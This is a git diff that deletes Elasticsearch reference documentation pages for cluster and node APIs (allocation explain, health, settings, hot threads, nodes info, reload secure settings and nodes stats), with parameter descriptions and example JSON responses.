"last_allocation_status" : "no" - }, - "can_allocate" : "no", <3> - "allocate_explanation" : "cannot allocate because allocation is not permitted to any of the nodes", - "node_allocation_decisions" : [ - { - "node_id" : "8qt2rY-pT6KNZB3-hGfLnw", - "node_name" : "node-0", - "transport_address" : "127.0.0.1:9401", - "node_attributes" : {}, - "node_decision" : "no", <4> - "weight_ranking" : 1, - "deciders" : [ - { - "decider" : "filter", <5> - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" <6> - } - ] - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"at" : "[^"]*"/"at" : $body.$_path/] -// TESTRESPONSE[s/"node_id" : "[^"]*"/"node_id" : $body.$_path/] -// TESTRESPONSE[s/"transport_address" : "[^"]*"/"transport_address" : $body.$_path/] -// TESTRESPONSE[s/"node_attributes" : \{\}/"node_attributes" : $body.$_path/] - -<1> The current state of the shard. -<2> The reason for the shard originally becoming unassigned. -<3> Whether to allocate the shard. -<4> Whether to allocate the shard to the particular node. -<5> The decider which led to the `no` decision for the node. -<6> An explanation as to why the decider returned a `no` decision, with a helpful hint pointing to the setting that led to the decision. - - -The API response output for an unassigned primary shard that had previously been -allocated to a node in the cluster: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "unassigned", - "unassigned_info" : { - "reason" : "NODE_LEFT", - "at" : "2017-01-04T18:03:28.464Z", - "details" : "node_left[OIWe8UhhThCK0V5XfmdrmQ]", - "last_allocation_status" : "no_valid_shard_copy" - }, - "can_allocate" : "no_valid_shard_copy", - "allocate_explanation" : "cannot allocate because a previous copy of the primary shard existed but can no longer be found on the nodes in the cluster" -} --------------------------------------------------- -// NOTCONSOLE - - -===== Example of an unassigned replica shard explanation - -The API response output for a replica that is unassigned due to delayed -allocation: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : false, - "current_state" : "unassigned", - "unassigned_info" : { - "reason" : "NODE_LEFT", - "at" : "2017-01-04T18:53:59.498Z", - "details" : "node_left[G92ZwuuaRY-9n8_tc-IzEg]", - "last_allocation_status" : "no_attempt" - }, - "can_allocate" : "allocation_delayed", - "allocate_explanation" : "cannot allocate because the cluster is still waiting 59.8s for the departed node holding a replica to rejoin, despite being allowed to allocate the shard to at least one other node", - "configured_delay" : "1m", <1> - "configured_delay_in_millis" : 60000, - "remaining_delay" : "59.8s", <2> - "remaining_delay_in_millis" : 59824, - "node_allocation_decisions" : [ - { - "node_id" : "pmnHu_ooQWCPEFobZGbpWw", - "node_name" : "node_t2", - "transport_address" : "127.0.0.1:9402", - "node_decision" : "yes" - }, - { - "node_id" : "3sULLVJrRneSg0EfBB-2Ew", - "node_name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "node_decision" : "no", - "store" : { <3> - "matching_size" : "4.2kb", - "matching_size_in_bytes" : 4325 - }, - "deciders" : [ - { - "decider" : "same_shard", - "decision" : "NO", - "explanation" : "a copy of this shard is already allocated to this node [[my-index-000001][0], node[3sULLVJrRneSg0EfBB-2Ew], [P], s[STARTED], a[id=eV9P8BN1QPqRc3B4PLx6cg]]" - } - ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> The configured delay before allocating a replica shard that does not exist due to the node holding it leaving the cluster. -<2> The remaining delay before allocating the replica shard. -<3> Information about the shard data found on a node. - - -===== Examples of allocated shard explanations - -The API response output for an assigned shard that is not allowed to remain on -its current node and is required to move: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "started", - "current_node" : { - "id" : "8lWJeJ7tSoui0bxrwuNhTA", - "name" : "node_t1", - "transport_address" : "127.0.0.1:9401" - }, - "can_remain_on_current_node" : "no", <1> - "can_remain_decisions" : [ <2> - { - "decider" : "filter", - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" - } - ], - "can_move_to_other_node" : "no", <3> - "move_explanation" : "cannot move shard to another node, even though it is not allowed to remain on its current node", - "node_allocation_decisions" : [ - { - "node_id" : "_P8olZS8Twax9u6ioN-GGA", - "node_name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "node_decision" : "no", - "weight_ranking" : 1, - "deciders" : [ - { - "decider" : "filter", - "decision" : "NO", - "explanation" : "node does not match index setting [index.routing.allocation.include] filters [_name:\"non_existent_node\"]" - } - ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> Whether the shard is allowed to remain on its current node. -<2> The deciders that factored into the decision of why the shard is not allowed to remain on its current node. -<3> Whether the shard is allowed to be allocated to another node. - - -The API response output for an assigned shard that remains on its current node -because moving the shard to another node does not form a better cluster balance: - -[source,js] --------------------------------------------------- -{ - "index" : "my-index-000001", - "shard" : 0, - "primary" : true, - "current_state" : "started", - "current_node" : { - "id" : "wLzJm4N4RymDkBYxwWoJsg", - "name" : "node_t0", - "transport_address" : "127.0.0.1:9400", - "weight_ranking" : 1 - }, - "can_remain_on_current_node" : "yes", - "can_rebalance_cluster" : "yes", <1> - "can_rebalance_to_other_node" : "no", <2> - "rebalance_explanation" : "cannot rebalance as no target node exists that can both allocate this shard and improve the cluster balance", - "node_allocation_decisions" : [ - { - "node_id" : "oE3EGFc8QN-Tdi5FFEprIA", - "node_name" : "node_t1", - "transport_address" : "127.0.0.1:9401", - "node_decision" : "worse_balance", <3> - "weight_ranking" : 1 - } - ] -} --------------------------------------------------- -// NOTCONSOLE -<1> Whether rebalancing is allowed on the cluster. -<2> Whether the shard can be rebalanced to another node. -<3> The reason the shard cannot be rebalanced to the node, in this case indicating that it offers no better balance than the current node. diff --git a/docs/reference/cluster/get-settings.asciidoc b/docs/reference/cluster/get-settings.asciidoc deleted file mode 100644 index 16b88f60501..00000000000 --- a/docs/reference/cluster/get-settings.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[cluster-get-settings]] -=== Cluster get settings API -++++ -Cluster get settings -++++ - -Returns cluster-wide settings. - -[source,console] ----- -GET /_cluster/settings ----- - -[[cluster-get-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-get-settings-api-request]] -==== {api-request-title} - -`GET /_cluster/settings` - -[[cluster-get-settings-api-desc]] -==== {api-description-title} - -By default, this API call only returns settings that have been explicitly -defined, but can also include the default settings by calling the -`include_defaults` parameter. - - -[[cluster-get-settings-api-query-params]] -==== {api-query-parms-title} - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`include_defaults`:: - (Optional, Boolean) If `true`, returns all default cluster settings. - Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] \ No newline at end of file diff --git a/docs/reference/cluster/health.asciidoc b/docs/reference/cluster/health.asciidoc deleted file mode 100644 index e958a29d75b..00000000000 --- a/docs/reference/cluster/health.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[[cluster-health]] -=== Cluster health API -++++ -Cluster health -++++ - -Returns the health status of a cluster. - -[[cluster-health-api-request]] -==== {api-request-title} - -`GET /_cluster/health/` - -[[cluster-health-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-health-api-desc]] -==== {api-description-title} - -The cluster health API returns a simple status on the health of the -cluster. You can also use the API to get the health status of only specified -data streams and indices. For data streams, the API retrieves the health status -of the stream's backing indices. - -The cluster health status is: `green`, `yellow` or `red`. On the shard level, a -`red` status indicates that the specific shard is not allocated in the cluster, -`yellow` means that the primary shard is allocated but replicas are not, and -`green` means that all shards are allocated. The index level status is -controlled by the worst shard status. The cluster status is controlled by the -worst index status. - -One of the main benefits of the API is the ability to wait until the cluster -reaches a certain high water-mark health level. For example, the following will -wait for 50 seconds for the cluster to reach the `yellow` level (if it reaches -the `green` or `yellow` status before 50 seconds elapse, it will return at that -point): - -[source,console] --------------------------------------------------- -GET /_cluster/health?wait_for_status=yellow&timeout=50s --------------------------------------------------- - -[[cluster-health-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cluster-health-api-query-params]] -==== {api-query-parms-title} - -`level`:: - (Optional, string) Can be one of `cluster`, `indices` or `shards`. Controls - the details level of the health information returned. Defaults to `cluster`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`wait_for_active_shards`:: - (Optional, string) A number controlling to how many active shards to wait - for, `all` to wait for all shards in the cluster to be active, or `0` to not - wait. Defaults to `0`. - -`wait_for_events`:: - (Optional, string) Can be one of `immediate`, `urgent`, `high`, `normal`, - `low`, `languid`. Wait until all currently queued events with the given - priority are processed. - -`wait_for_no_initializing_shards`:: - (Optional, Boolean) A boolean value which controls whether to wait (until - the timeout provided) for the cluster to have no shard initializations. - Defaults to false, which means it will not wait for initializing shards. - -`wait_for_no_relocating_shards`:: - (Optional, Boolean) A boolean value which controls whether to wait (until - the timeout provided) for the cluster to have no shard relocations. Defaults - to false, which means it will not wait for relocating shards. - -`wait_for_nodes`:: - (Optional, string) The request waits until the specified number `N` of - nodes is available. It also accepts `>=N`, `<=N`, `>N` and ` `yellow` > `red`. By default, will not - wait for any status. - -[[cluster-health-api-response-body]] -==== {api-response-body-title} - -`cluster_name`:: - (string) The name of the cluster. - -`status`:: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cluster-health-status] - -`timed_out`:: - (Boolean) If `false` the response returned within the period of - time that is specified by the `timeout` parameter (`30s` by default). - -`number_of_nodes`:: - (integer) The number of nodes within the cluster. - -`number_of_data_nodes`:: - (integer) The number of nodes that are dedicated data nodes. - -`active_primary_shards`:: - (integer) The number of active primary shards. - -`active_shards`:: - (integer) The total number of active primary and replica shards. - -`relocating_shards`:: - (integer) The number of shards that are under relocation. - -`initializing_shards`:: - (integer) The number of shards that are under initialization. - -`unassigned_shards`:: - (integer) The number of shards that are not allocated. - -`delayed_unassigned_shards`:: - (integer) The number of shards whose allocation has been delayed by the - timeout settings. - -`number_of_pending_tasks`:: - (integer) The number of cluster-level changes that have not yet been - executed. - -`number_of_in_flight_fetch`:: - (integer) The number of unfinished fetches. - -`task_max_waiting_in_queue_millis`:: - (integer) The time expressed in milliseconds since the earliest initiated task - is waiting for being performed. - -`active_shards_percent_as_number`:: - (float) The ratio of active shards in the cluster expressed as a percentage. - -[[cluster-health-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cluster/health --------------------------------------------------- -// TEST[s/^/PUT test1\n/] - -The API returns the following response in case of a quiet single node cluster -with a single index with one shard and one replica: - -[source,console-result] --------------------------------------------------- -{ - "cluster_name" : "testcluster", - "status" : "yellow", - "timed_out" : false, - "number_of_nodes" : 1, - "number_of_data_nodes" : 1, - "active_primary_shards" : 1, - "active_shards" : 1, - "relocating_shards" : 0, - "initializing_shards" : 0, - "unassigned_shards" : 1, - "delayed_unassigned_shards": 0, - "number_of_pending_tasks" : 0, - "number_of_in_flight_fetch": 0, - "task_max_waiting_in_queue_millis": 0, - "active_shards_percent_as_number": 50.0 -} --------------------------------------------------- -// TESTRESPONSE[s/testcluster/integTest/] -// TESTRESPONSE[s/"number_of_pending_tasks" : 0,/"number_of_pending_tasks" : $body.number_of_pending_tasks,/] -// TESTRESPONSE[s/"task_max_waiting_in_queue_millis": 0/"task_max_waiting_in_queue_millis": $body.task_max_waiting_in_queue_millis/] - -The following is an example of getting the cluster health at the -`shards` level: - -[source,console] --------------------------------------------------- -GET /_cluster/health/my-index-000001?level=shards --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/cluster/nodes-hot-threads.asciidoc b/docs/reference/cluster/nodes-hot-threads.asciidoc deleted file mode 100644 index 5e1fa9a36a2..00000000000 --- a/docs/reference/cluster/nodes-hot-threads.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ -[[cluster-nodes-hot-threads]] -=== Nodes hot threads API -++++ -Nodes hot threads -++++ - -Returns the hot threads on each selected node in the cluster. - - -[[cluster-nodes-hot-threads-api-request]] -==== {api-request-title} - -`GET /_nodes/hot_threads` + - -`GET /_nodes//hot_threads` - -[[cluster-nodes-hot-threads-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-hot-threads-api-desc]] -==== {api-description-title} - -This API yields a breakdown of the hot threads on each selected node in the -cluster. The output is plain text with a breakdown of each node's top hot -threads. - - -[[cluster-nodes-hot-threads-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-hot-threads-api-query-params]] -==== {api-query-parms-title} - - -`ignore_idle_threads`:: - (Optional, Boolean) If true, known idle threads (e.g. waiting in a socket - select, or to get a task from an empty queue) are filtered out. Defaults to - true. - -`interval`:: - (Optional, <>) The interval to do the second - sampling of threads. Defaults to `500ms`. - -`snapshots`:: - (Optional, integer) Number of samples of thread stacktrace. Defaults to - `10`. - -`threads`:: - (Optional, integer) Specifies the number of hot threads to provide - information for. Defaults to `3`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`type`:: - (Optional, string) The type to sample. Available options are `block`, `cpu`, and - `wait`. Defaults to `cpu`. - - -[[cluster-nodes-hot-threads-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_nodes/hot_threads -GET /_nodes/nodeId1,nodeId2/hot_threads --------------------------------------------------- diff --git a/docs/reference/cluster/nodes-info.asciidoc b/docs/reference/cluster/nodes-info.asciidoc deleted file mode 100644 index 4b8d2e6be50..00000000000 --- a/docs/reference/cluster/nodes-info.asciidoc +++ /dev/null @@ -1,355 +0,0 @@ -[[cluster-nodes-info]] -=== Nodes info API -++++ -Nodes info -++++ - -Returns cluster nodes information. - - -[[cluster-nodes-info-api-request]] -==== {api-request-title} - -`GET /_nodes` + - -`GET /_nodes/` + - -`GET /_nodes/` + - -`GET /_nodes//` - -[[cluster-nodes-info-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - - -[[cluster-nodes-info-api-desc]] -==== {api-description-title} - -The cluster nodes info API allows to retrieve one or more (or all) of -the cluster nodes information. All the nodes selective options are explained -<>. - -By default, it returns all attributes and core settings for a node. - -[role="child_attributes"] -[[cluster-nodes-info-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Limits the information returned to the specific metrics. Supports a -comma-separated list, such as `http,ingest`. -+ -[%collapsible%open] -.Valid values for `` -==== -`http`:: -HTTP connection information. - -`ingest`:: -Statistics about ingest preprocessing. - -`jvm`:: -JVM stats, memory pool information, garbage collection, buffer pools, number of -loaded/unloaded classes. - -`os`:: -Operating system stats, load average, mem, swap. - -`plugins`:: -+ --- -Details about the installed plugins and modules per node. The following -information is available for each plugin and module: - -* `name`: plugin name -* `version`: version of Elasticsearch the plugin was built for -* `description`: short description of the plugin's purpose -* `classname`: fully-qualified class name of the plugin's entry point -* `has_native_controller`: whether or not the plugin has a native controller -process --- - -`process`:: -Process statistics, memory consumption, cpu usage, open file descriptors. - -`settings`:: -Lists all node settings in use as defined in the `elasticsearch.yml` file. - -`thread_pool`:: -Statistics about each thread pool, including current size, queue and rejected -tasks - -`transport`:: -Transport statistics about sent and received bytes in cluster communication. -==== - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-info-api-response-body]] -==== {api-response-body-title} - -`build_hash`:: - Short hash of the last git commit in this release. - -`host`:: - The node's host name. - -`ip`:: - The node's IP address. - -`name`:: - The node's name. - -`total_indexing_buffer`:: - Total heap allowed to be used to hold recently indexed - documents before they must be written to disk. This size is - a shared pool across all shards on this node, and is - controlled by <>. - -`total_indexing_buffer_in_bytes`:: - Same as `total_indexing_buffer`, but expressed in bytes. - -`transport_address`:: - Host and port where transport HTTP connections are accepted. - -`version`:: - {es} version running on this node. - -The `os` flag can be set to retrieve information that concern the operating -system: - -`os.refresh_interval_in_millis`:: - Refresh interval for the OS statistics - -`os.name`:: - Name of the operating system (ex: Linux, Windows, Mac OS X) - -`os.arch`:: - Name of the JVM architecture (ex: amd64, x86) - -`os.version`:: - Version of the operating system - -`os.available_processors`:: - Number of processors available to the Java virtual machine - -`os.allocated_processors`:: - The number of processors actually used to calculate thread pool size. This - number can be set with the <> - setting of a node and defaults to the number of processors reported by - the OS. - -The `process` flag can be set to retrieve information that concern the current -running process: - -`process.refresh_interval_in_millis`:: - Refresh interval for the process statistics - -`process.id`:: - Process identifier (PID) - -`process.mlockall`:: - Indicates if the process address space has been successfully locked in memory - - -[[cluster-nodes-info-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-nodes-info-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -# return just process -GET /_nodes/process - -# same as above -GET /_nodes/_all/process - -# return just jvm and process of only nodeId1 and nodeId2 -GET /_nodes/nodeId1,nodeId2/jvm,process - -# same as above -GET /_nodes/nodeId1,nodeId2/info/jvm,process - -# return all the information of only nodeId1 and nodeId2 -GET /_nodes/nodeId1,nodeId2/_all --------------------------------------------------- - -The `_all` flag can be set to return all the information - or you can omit it. - - -[[cluster-nodes-info-api-example-plugins]] -===== Example for plugins metric - -If `plugins` is specified, the result will contain details about the installed -plugins and modules: - -[source,console] --------------------------------------------------- -GET /_nodes/plugins --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": ... - "cluster_name": "elasticsearch", - "nodes": { - "USpTGYaBSIKbgSUJR2Z9lg": { - "name": "node-0", - "transport_address": "192.168.17:9300", - "host": "node-0.elastic.co", - "ip": "192.168.17", - "version": "{version}", - "build_flavor": "{build_flavor}", - "build_type": "{build_type}", - "build_hash": "587409e", - "roles": [ - "master", - "data", - "ingest" - ], - "attributes": {}, - "plugins": [ - { - "name": "analysis-icu", - "version": "{version}", - "description": "The ICU Analysis plugin integrates Lucene ICU module into elasticsearch, adding ICU relates analysis components.", - "classname": "org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin", - "has_native_controller": false - } - ], - "modules": [ - { - "name": "lang-painless", - "version": "{version}", - "description": "An easy, safe and fast scripting language for Elasticsearch", - "classname": "org.elasticsearch.painless.PainlessPlugin", - "has_native_controller": false - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_nodes": \.\.\./"_nodes": $body.$_path,/] -// TESTRESPONSE[s/"elasticsearch"/$body.cluster_name/] -// TESTRESPONSE[s/"USpTGYaBSIKbgSUJR2Z9lg"/\$node_name/] -// TESTRESPONSE[s/"name": "node-0"/"name": $body.$_path/] -// TESTRESPONSE[s/"transport_address": "192.168.17:9300"/"transport_address": $body.$_path/] -// TESTRESPONSE[s/"host": "node-0.elastic.co"/"host": $body.$_path/] -// TESTRESPONSE[s/"ip": "192.168.17"/"ip": $body.$_path/] -// TESTRESPONSE[s/"build_hash": "587409e"/"build_hash": $body.$_path/] -// TESTRESPONSE[s/"roles": \[[^\]]*\]/"roles": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^\}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/"plugins": \[[^\]]*\]/"plugins": $body.$_path/] -// TESTRESPONSE[s/"modules": \[[^\]]*\]/"modules": $body.$_path/] - - -[[cluster-nodes-info-api-example-ingest]] -===== Example for ingest metric - -If `ingest` is specified, the response contains details about the available -processors per node: - -[source,console] --------------------------------------------------- -GET /_nodes/ingest --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": ... - "cluster_name": "elasticsearch", - "nodes": { - "USpTGYaBSIKbgSUJR2Z9lg": { - "name": "node-0", - "transport_address": "192.168.17:9300", - "host": "node-0.elastic.co", - "ip": "192.168.17", - "version": "{version}", - "build_flavor": "{build_flavor}", - "build_type": "{build_type}", - "build_hash": "587409e", - "roles": [], - "attributes": {}, - "ingest": { - "processors": [ - { - "type": "date" - }, - { - "type": "uppercase" - }, - { - "type": "set" - }, - { - "type": "lowercase" - }, - { - "type": "gsub" - }, - { - "type": "convert" - }, - { - "type": "remove" - }, - { - "type": "fail" - }, - { - "type": "foreach" - }, - { - "type": "split" - }, - { - "type": "trim" - }, - { - "type": "rename" - }, - { - "type": "join" - }, - { - "type": "append" - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_nodes": \.\.\./"_nodes": $body.$_path,/] -// TESTRESPONSE[s/"elasticsearch"/$body.cluster_name/] -// TESTRESPONSE[s/"USpTGYaBSIKbgSUJR2Z9lg"/\$node_name/] -// TESTRESPONSE[s/"name": "node-0"/"name": $body.$_path/] -// TESTRESPONSE[s/"transport_address": "192.168.17:9300"/"transport_address": $body.$_path/] -// TESTRESPONSE[s/"host": "node-0.elastic.co"/"host": $body.$_path/] -// TESTRESPONSE[s/"ip": "192.168.17"/"ip": $body.$_path/] -// TESTRESPONSE[s/"build_hash": "587409e"/"build_hash": $body.$_path/] -// TESTRESPONSE[s/"roles": \[[^\]]*\]/"roles": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^\}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/"processors": \[[^\]]*\]/"processors": $body.$_path/] diff --git a/docs/reference/cluster/nodes-reload-secure-settings.asciidoc b/docs/reference/cluster/nodes-reload-secure-settings.asciidoc deleted file mode 100644 index 4ccebe6b60c..00000000000 --- a/docs/reference/cluster/nodes-reload-secure-settings.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[cluster-nodes-reload-secure-settings]] -=== Nodes reload secure settings API -++++ -Nodes reload secure settings -++++ - -Reloads the keystore on nodes in the cluster. - -[[cluster-nodes-reload-secure-settings-api-request]] -==== {api-request-title} - -`POST /_nodes/reload_secure_settings` + -`POST /_nodes//reload_secure_settings` - -[[cluster-nodes-reload-secure-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-nodes-reload-secure-settings-api-desc]] -==== {api-description-title} - -<> are stored in an on-disk keystore. Certain -of these settings are <>. That is, you -can change them on disk and reload them without restarting any nodes in the -cluster. When you have updated reloadable secure settings in your keystore, you -can use this API to reload those settings on each node. - -When the {es} keystore is password protected and not simply obfuscated, you must -provide the password for the keystore when you reload the secure settings. -Reloading the settings for the whole cluster assumes that all nodes' keystores -are protected with the same password; this method is allowed only when -<>. Alternatively, you can -reload the secure settings on each node by locally accessing the API and passing -the node-specific {es} keystore password. - -[[cluster-nodes-reload-secure-settings-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) The names of particular nodes in the cluster to target. - For example, `nodeId1,nodeId2`. For node selection options, see - <>. - -NOTE: {es} requires consistent secure settings across the cluster nodes, but -this consistency is not enforced. Hence, reloading specific nodes is not -standard. It is justifiable only when retrying failed reload operations. - -[[cluster-nodes-reload-secure-settings-api-request-body]] -==== {api-request-body-title} - -`secure_settings_password`:: - (Optional, string) The password for the {es} keystore. - -[[cluster-nodes-reload-secure-settings-api-example]] -==== {api-examples-title} - -The following examples assume a common password for the {es} keystore on every -node of the cluster: - -[source,console] --------------------------------------------------- -POST _nodes/reload_secure_settings -{ - "secure_settings_password":"s3cr3t" -} -POST _nodes/nodeId1,nodeId2/reload_secure_settings -{ - "secure_settings_password":"s3cr3t" -} --------------------------------------------------- -// TEST[setup:node] -// TEST[s/nodeId1,nodeId2/*/] - -The response contains the `nodes` object, which is a map, keyed by the -node id. Each value has the node `name` and an optional `reload_exception` -field. The `reload_exception` field is a serialization of the exception -that was thrown during the reload process, if any. - -[source,console-result] --------------------------------------------------- -{ - "_nodes": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "cluster_name": "my_cluster", - "nodes": { - "pQHNt5rXTTWNvUgOrdynKg": { - "name": "node-0" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"my_cluster"/$body.cluster_name/] -// TESTRESPONSE[s/"pQHNt5rXTTWNvUgOrdynKg"/\$node_name/] diff --git a/docs/reference/cluster/nodes-stats.asciidoc b/docs/reference/cluster/nodes-stats.asciidoc deleted file mode 100644 index a9eba907526..00000000000 --- a/docs/reference/cluster/nodes-stats.asciidoc +++ /dev/null @@ -1,2367 +0,0 @@ -[[cluster-nodes-stats]] -=== Nodes stats API -++++ -Nodes stats -++++ - -Returns cluster nodes statistics. - -[[cluster-nodes-stats-api-request]] -==== {api-request-title} - -`GET /_nodes/stats` + - -`GET /_nodes//stats` + - -`GET/_nodes/stats/` + - -`GET/_nodes//stats/` + - -`GET /_nodes/stats//` + - -`GET /_nodes//stats//` - -[[cluster-nodes-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-stats-api-desc]] -==== {api-description-title} - -You can use the cluster nodes stats API to retrieve statistics for nodes in a cluster. - - -All the nodes selective options are explained <>. - -By default, all stats are returned. You can limit the returned information by -using metrics. - -[[cluster-nodes-stats-api-path-params]] -==== {api-path-parms-title} - - -``:: - (Optional, string) Limits the information returned to the specific metrics. - A comma-separated list of the following options: -+ --- - `adaptive_selection`:: - Statistics about <>. - - `breaker`:: - Statistics about the field data circuit breaker. - - `discovery`:: - Statistics about the discovery. - - `fs`:: - File system information, data path, free disk space, read/write - stats. - - `http`:: - HTTP connection information. - - `indexing_pressure`:: - Statistics about the node's indexing load and related rejections. - - `indices`:: - Indices stats about size, document count, indexing and deletion times, - search times, field cache size, merges and flushes. - - `ingest`:: - Statistics about ingest preprocessing. - - `jvm`:: - JVM stats, memory pool information, garbage collection, buffer - pools, number of loaded/unloaded classes. - - `os`:: - Operating system stats, load average, mem, swap. - - `process`:: - Process statistics, memory consumption, cpu usage, open - file descriptors. - - `thread_pool`:: - Statistics about each thread pool, including current size, queue and - rejected tasks. - - `transport`:: - Transport statistics about sent and received bytes in cluster - communication. --- - -``:: - (Optional, string) Limit the information returned for `indices` metric to - the specific index metrics. It can be used only if `indices` (or `all`) - metric is specified. Supported metrics are: -+ --- - * `completion` - * `docs` - * `fielddata` - * `flush` - * `get` - * `indexing` - * `merge` - * `query_cache` - * `recovery` - * `refresh` - * `request_cache` - * `search` - * `segments` - * `store` - * `translog` - * `warmer` --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-stats-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=completion-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fielddata-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=groups] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=level] - -`types`:: - (Optional, string) A comma-separated list of document types for the - `indexing` index metric. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-segment-file-sizes] - -[role="child_attributes"] -[[cluster-nodes-stats-api-response-body]] -==== {api-response-body-title} - -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster. Based on the <> setting. - -`nodes`:: -(object) -Contains statistics for the nodes selected by the request. -+ -.Properties of `nodes` -[%collapsible%open] -==== -``:: -(object) -Contains statistics for the node. -+ -.Properties of `` -[%collapsible%open] -===== -`timestamp`:: -(integer) -Time the node stats were collected for this response. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`name`:: -(string) -Human-readable identifier for the node. Based on the <> setting. - -`transport_address`:: -(string) -Host and port for the <>, used for internal -communication between nodes in a cluster. - -`host`:: -(string) -Network host for the node, based on the <> setting. - -`ip`:: -(string) -IP address and port for the node. - -`roles`:: -(array of strings) -Roles assigned to the node. See <>. - -`attributes`:: -(object) -Contains a list of attributes for the node. - -[[cluster-nodes-stats-api-response-body-indices]] -`indices`:: -(object) -Contains statistics about indices with shards assigned to the node. -+ -.Properties of `indices` -[%collapsible%open] -====== -`docs`:: -(object) -Contains statistics about documents across all primary shards assigned to the -node. -+ -.Properties of `docs` -[%collapsible%open] -======= -`count`:: -(integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`deleted`:: -(integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] -======= - -`store`:: -(object) -Contains statistics about the size of shards assigned to the node. -+ -.Properties of `store` -[%collapsible%open] -======= -`size`:: -(<>) -Total size of all shards assigned to the node. - -`size_in_bytes`:: -(integer) -Total size, in bytes, of all shards assigned to the node. - -`reserved`:: -(<>) -A prediction of how much larger the shard stores on this node will eventually -grow due to ongoing peer recoveries, restoring snapshots, and similar -activities. A value of `-1b` indicates that this is not available. - -`reserved_in_bytes`:: -(integer) -A prediction, in bytes, of how much larger the shard stores on this node will -eventually grow due to ongoing peer recoveries, restoring snapshots, and 